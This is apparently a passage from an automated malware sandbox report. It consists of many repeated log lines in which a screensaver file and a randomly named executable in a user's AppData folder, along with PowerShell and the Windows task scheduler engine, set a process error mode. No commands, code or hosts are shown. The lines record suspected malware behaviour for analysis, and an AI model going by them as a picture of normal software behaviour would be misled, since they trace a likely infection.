                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess information set: NOOPENFILEERRORBOX
